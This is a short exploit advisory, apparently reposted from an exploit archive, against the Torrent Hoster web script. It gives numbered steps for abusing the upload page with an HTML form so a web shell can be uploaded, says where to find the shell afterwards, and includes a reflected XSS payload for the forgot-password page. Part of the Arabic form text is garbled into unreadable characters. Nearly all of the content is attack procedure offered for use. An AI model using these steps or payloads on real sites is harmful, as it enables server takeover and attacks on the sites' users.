======================================================================================== | # Title : Torrent Hoster Remont Upload Exploit | # Author : El-Kahina | # Home : www.h4kz.com | | # Script : Powered by Torrent Hoster. | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) | # Bug : Upload | ====================== Exploit By El-Kahina ================================= # Exploit : 1 - use tamper data : http://127.0.0.1/torrenthoster//torrents.php?mode=upload 2- <center> Powered by Torrent Hoster <br /> <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;"> <strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br /> <br> <input type="file" name="upfile" size="50" /><br /> <input type="submit" value="��� �����" id="upload" /> </form> <div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div> </center> 3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell) 4 - Xss: http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt> ========================================== Greetz : Exploit-db Team all my friend :(Dz-Ghost Team ) im indoushka's sister ------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论